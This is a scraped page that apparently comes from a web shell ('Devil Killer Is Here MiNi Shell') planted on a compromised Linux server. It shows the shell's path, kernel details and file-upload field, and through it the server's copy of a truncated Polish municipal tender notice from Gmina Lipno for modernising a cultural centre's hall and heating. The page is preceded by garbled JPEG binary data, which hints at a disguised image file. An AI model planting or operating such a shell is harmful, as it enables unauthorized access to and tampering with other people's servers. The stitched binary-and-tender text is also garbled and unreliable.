JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210506/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210506/0004773101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00047731 z dnia 2021-05-06</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja sali widowiskowej Gminnego Ośrodka Kultury w Lipnie wraz ze zmianą systemu ogrzewania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Lipno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050764</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Powstańców Wielkopolskich 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lipno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">65 5340127</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lipno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lipno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja sali widowiskowej Gminnego Ośrodka Kultury w Lipnie wraz ze zmianą systemu ogrzewania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e0c8c40-ae4a-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00047731</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002855/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Modernizacja sali widowiskowej Gminnego Ośrodka Kultury w Lipnie wraz ze zmianą systemu ogrzewania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lipno/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lipno/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zostały ujęte w rozdziale IX i X SWZ nr RI.271.3.2021. Z uwagi na limit znaków w ogłoszeniu Zamawiający w niniejszym punkcie nie jest w stanie opisać wszystkich wymagań.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych osobowych jest Urząd Gminy Lipno ul. Powstańców Wielkopolskich 9, 64-111 Lipno.2) Administrator Danych wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować pod adresem e-mail: iod@lipno.pl lub pisemnie na adres siedziby Administratora Danych.3) Pani/Pana dane osobowe przetwarzane będą w celu niezbędnym do wypełnienie obowiązku pranego ciążącego na Administratorze Danych na podstawie ustawy z dnia 11 września 2019r. Prawo zamówień publicznych w związku z art. 6 ust. 1 lit. c RODO 4) Pani/Pana dane osobowe mogą być przekazywane innym odbiorcom na podstawie przepisów prawa lub zawartych umów i nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej. 5) Pani/Pana dane osobowe będą przechowywane przez okres niezbędny do realizacji celu, w którym zostały zebrane, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy prawa. 6) Posiada Pani/Pan prawo dostępu do treści swoich danych, ich sprostowania, ograniczenia przetwarzania oraz wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy RODO. 7) Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym, niezbędnym do udziału w postępowaniu o udzielenie zamówienia publicznego. 8) Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia pn.: „Modernizacja sali widowiskowej Gminnego Ośrodka Kultury w Lipnie wraz ze zmianą systemu ogrzewania” składa się z dwóch części:Część nr 1 „Wymiana źródła ciepła wraz ze zmianą technologii kotłowni w budynku Gminnego Ośrodka Kultury” polega na wymianie istniejącego niskosprawnego kotła wraz ze związanymi z nim urządzeniamitechnologicznymi na dwa kotły na paliwo stałe (ekogroszek) . Szczegółowy zakres przedmiotu zamówienia dla Części nr 1 określa:1. projekt wykonawczy „Wymiany źródła ciepła wraz z technologią kotłowni” - branża sanitarna [załącznik nr 4 do SWZ]Autorem dokumentacji budowlanej jest:ET-EnergoAudytul. Bernardyńska 264-000 Kościan2. Szczegółowa specyfikacja techniczna wykonania i odbioru robót [załącznik nr 5 do SWZ]Autorem STWIOR-u jest: ETEnergoAudytul. Bernardyńska 264-000 Kościan. Ponadto załączono przedmiar robót [załącznik nr 6 do SWZ], który stanowi wyłącznie element pomocniczy i nie jest zestawieniem planowanych prac w rozumieniu art. 629 oraz 630 §1 Kodeksu cywilnego2.Opis przedmiotu zamówienia obejmuje również:a) zorganizowanie zaplecza budowy wraz z kosztami niezbędnymi w tymzakresie, b) wykonanie niezbędnych badań koniecznych do przeprowadzenia procesu odbioru iuporządkowanie terenu po wykonaniu przedmiotu zamówienia,c) zabezpieczenie terenuobjętego robotami przed dostępem osób postronnych,d) zorganizowanie i przeprowadzenieniezbędnych prób, pomiarów, badań i odbiorów o ile dotyczy.3. Wymagania związane zrealizacją zamówienia w zakresie zatrudnienia przez wykonawcę lub podwykonawcę napodstawie stosunku pracy osób wykonujących wskazane przez zamawiającego czynności wzakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy wsposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2019r. poz. 1040 z późn. zm. ) obejmują następujące rodzaje czynności: a) roboty związane zwykonaniem centralnego ogrzewania – dla Części nr 1Wykonawca jest zobowiązany zawrzeć wkażdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców dozatrudnienia na umowę o pracę wszystkich osób, które wykonują prace w sposób określony wart. 22 § 1 Kodeksu pracy.4. Szczegółowe wymagania dotyczące realizacji oraz egzekwowaniawymogu zatrudnienia na podstawie stosunku pracy zostały określone we wzorze umowystanowiącym dla Części nr 1 Załącznik nr 10 do SWZ 5. Zakres zamówienia oraz szczegółowewłaściwości i wymagania w stosunku do przedmiotu zamówienia zawarte są w SWZ izałącznikach do SWZ, w tym z: dokumentacją projektową, specyfikacjami technicznymiwykonania i odbioru robót, obowiązującymi przepisami, w tym w szczególności z przepisamiustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2020 poz. 1333 ze zm.) oraz zasadamiwiedzy technicznej. UWAGA: Jeżeli opis przedmiotu zamówienia wskazywałby w odniesieniu domateriałów lub urządzeń lub rozwiązań znaki towarowe, patenty lub pochodzenie, to zgodnie zustawą Prawo zamówień publicznych Zamawiający dopuszcza zaoferowanie materiałów/urządzeń/ rozwiązań równoważnych. Materiały lub urządzenia pochodzące od konkretnegoproducenta określają minimalne parametry jakościowe i cechy użytkowe, jakim musząodpowiadać materiały lub urządzenia proponowane przez Wykonawcę, aby zostały spełnionewymagania stawiane przez Zamawiającego i stanowią jedynie wzorzec, przykład jakościowyprzedmiotu zamówienia, a to oznacza, że Zamawiający dopuszcza produkty o parametrachjakościowych i cechach użytkowych (równoważnych), tj. nie gorszych niż parametry wskazanegoproduktu, materiału, urządzenia, elementu i uzna każdy produkt o wskazanych lub lepszychparametrach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331100-7 - Instalowanie centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzieodpowiadać wymaganiom zawartym w ustawie Pzp, SWZ i uzyska najwyższą liczbę punktów wyliczoną oparciu o kryteria oceny ofert określone w rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rekojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzieodpowiadać wymaganiom zawartym w ustawie Pzp, SWZ i uzyska najwyższą liczbę punktów wyliczoną oparciu o kryteria oceny ofert określone w rozdziale XVI SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiot zamówienia pn.: „Modernizacja sali widowiskowej Gminnego Ośrodka Kultury wLipnie wraz ze zmianą systemu ogrzewania” składa się z dwóch części:Część nr 2: „Montażstolarki okiennej i drzwiowej w budynku Gminnego Ośrodka Kultury” polega na Szczegółowyzakres przedmiotu zamówienia dla Części nr 2 określa:1. dokument „Opis PrzedmiotuZamówienia dla Części nr 2” stanowiący załącznik nr 7 do SWZ.2. Szczegółowa specyfikacjatechniczna wykonania i odbioru robót [załącznik nr 8 do SWZ].Ponadto załączono przedmiarrobót w wersji edytowalnej i pdf [załącznik nr 9 i 9a do SWZ], który stanowi wyłącznie elementpomocniczy i nie jest zestawieniem planowanych prac w rozumieniu art. 629 oraz 630 §1Kodeksu cywilnego2. Opis przedmiotu zamówienia obejmuje również:a) zorganizowaniezaplecza budowy wraz z kosztami niezbędnymi w tym zakresie, b) wykonanie niezbędnychbadań koniecznych do przeprowadzenia procesu odbioru i uporządkowanie terenu po wykonaniuprzedmiotu zamówienia,c) zabezpieczenie terenu objętego robotami przed dostępem osóbpostronnych,d) zorganizowanie i przeprowadzenie niezbędnych prób, pomiarów, badań iodbiorów o ile dotyczy.3. Wymagania związane z realizacją zamówienia w zakresie zatrudnieniaprzez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonującychwskazane przez zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanietych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26czerwca 1974 r. - Kodeks pracy (Dz. U. z 2019 r. poz. 1040 z późn. zm. ) obejmują następującerodzaje czynności: b) roboty związane z montażem stolarki okiennej i drzwiowej – dla części nr2Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisyzobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób, którewykonują prace w sposób określony w art. 22 § 1 Kodeksu pracy.4. Szczegółowe wymaganiadotyczące realizacji oraz egzekwowania wymogu zatrudnienia na podstawie stosunku pracyzostały określone we wzorze umowy stanowiącym dla Części nr 2 załącznik nr 10a do SWZ5.Zakres zamówienia oraz szczegółowe właściwości i wymagania w stosunku do przedmiotuzamówienia zawarte są w SWZ i załącznikach do SWZ, w tym z: dokumentacją projektową,specyfikacjami technicznymi wykonania i odbioru robót, obowiązującymi przepisami, w tym wszczególności z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2020 poz.1333 ze zm.) oraz zasadami wiedzy technicznej. UWAGA: Jeżeli opis przedmiotu zamówieniawskazywałby w odniesieniu do materiałów lub urządzeń lub rozwiązań znaki towarowe, patentylub pochodzenie, to zgodnie z ustawą Prawo zamówień publicznych Zamawiający dopuszczazaoferowanie materiałów /urządzeń/ rozwiązań równoważnych. Materiały lub urządzeniapochodzące od konkretnego producenta określają minimalne parametry jakościowe i cechyużytkowe, jakim muszą odpowiadać materiały lub urządzenia proponowane przez Wykonawcę,aby zostały spełnione wymagania stawiane przez Zamawiającego i stanowią jedynie wzorzec,przykład jakościowy przedmiotu zamówienia, a to oznacza, że Zamawiający dopuszcza produktyo parametrach jakościowych i cechach użytkowych (równoważnych), tj. nie gorszych niżparametry wskazanego produktu, materiału, urządzenia, elementu i uzna każdy produkt owskazanych lub lepszych parametrach. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 0 </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45421000-4 - Roboty w zakresie stolarki budowlanej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzieodpowiadać wymaganiom zawartym w ustawie Pzp, SWZ i uzyska najwyższą liczbę punktów wyliczoną oparciu o kryteria oceny ofert określone w rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rekojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Zamawiający udzieli zamówienia Wykonawcy, którego oferta będzieodpowiadać wymaganiom zawartym w ustawie Pzp, SWZ i uzyska najwyższą liczbę punktów wyliczoną oparciu o kryteria oceny ofert określone w rozdziale XVI SWZ. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga składania podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu. Zamawiający wymaga jedynie złożenia oświadczenia, o którym mowa w art. 125 ust. 1 ustawy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.Ofertę składa się na Formularzu Ofertowym zgodnie z Załącznikiem nr 1a – dla Części nr 1 izałącznikiem nr 1b – dla Części nr 2 do SWZ.2.Do oferty należy załączyć odpowiednieoświadczenia/dokumenty, o których mowa w Rozdziale VIII pkt od 1 do 3 SWZ.3.Oferta powinnabyć podpisana przez osobę upoważnioną do reprezentowania Wykonawcy (Wykonawcówwspólnie ubiegających się o udzielenie zamówienia) Jeżeli upoważnienie nie wynika z ogólniedostępnych danych rejestrowych (wpis KRS, CEIDG) do oferty należy załączyć dokumentpotwierdzający umocowanie danej osoby/osób do podpisania oferty.4. W przypadku gdyWykonawcę/-ów reprezentuje pełnomocnik, należy do oferty załączyć pełnomocnictwo doreprezentowania Wykonawcy/-ów określające jego zakres i podpisane przez osobyupoważnione do reprezentowania Wykonawcy/-ów. Pełnomocnictwo składa się w formieelektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisemosobistym. Dopuszcza się także złożenie cyfrowego odwzorowania pełnomocnictwa(sporządzonego uprzednio w postaci papierowej) opatrzonego kwalifikowanym podpisemelektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodnośćcyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodnościcyfrowego odwzorowania z pełnomocnictwem w postaci papierowej dokonuje mocodawca lubnotariusz (w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatrujekwalifikowanym podpisem elektronicznym). Cyfrowe odwzorowanie 